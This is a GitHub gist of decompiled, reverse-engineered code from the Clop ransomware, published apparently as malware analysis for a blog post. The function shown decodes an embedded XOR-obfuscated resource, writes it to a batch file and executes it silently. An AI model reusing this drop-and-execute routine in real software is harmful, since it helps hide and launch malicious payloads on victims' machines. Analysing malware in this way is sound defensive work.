Skip to content

Instantly share code, notes, and snippets.

@danzek danzek/deobfuscateClopResource.cpp
Created Apr 1, 2019

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
decompiled / reverse-engineered Clop deobfuscation of SIXSIX1 resource code
Raw
deobfuscateClopResource.cpp
HINSTANCE LoadExecuteClearSystemsBatchFile()
{
HMODULE hModule; // eax
HMODULE phModule; // ebx
HRSRC hRsrcSIXSIX1; // eax
HRSRC phRsrcSIXSIX1; // esi
HGLOBAL hGlobalRsrcSIXSIX1; // eax
const void *ResourceLock; // edi
DWORD cbResourceSIXSIX1; // esi
HGLOBAL hDecryptedResourceMemory; // ebx
DWORD pcbResourceSIXSIX1; // edi
DWORD i; // esi
HANDLE hDecryptedFile; // esi
DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
CHAR currentPath; // [esp+14h] [ebp-20Ch]
CHAR FileName; // [esp+118h] [ebp-108h]
hModule = GetModuleHandleW(0);
phModule = hModule;
hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
phRsrcSIXSIX1 = hRsrcSIXSIX1;
hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
nNumberOfBytesToWrite = cbResourceSIXSIX1;
hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
pcbResourceSIXSIX1 = cbResourceSIXSIX1;
for ( i = 0; i < pcbResourceSIXSIX1; ++i )
*((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];
GetCurrentDirectoryA(260u, &currentPath);
wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);
NumberOfBytesWritten = 0;
hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
if ( hDecryptedFile != (HANDLE)-1 )
{
WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
CloseHandle(hDecryptedFile);
}
GlobalFree(hDecryptedResourceMemory);
return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
}
@danzek

This comment has been minimized.

Sign in to view
Copy link
Owner Author

commented Apr 3, 2019

For blog post: https://laserkittens.com/ransomware-sucks/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.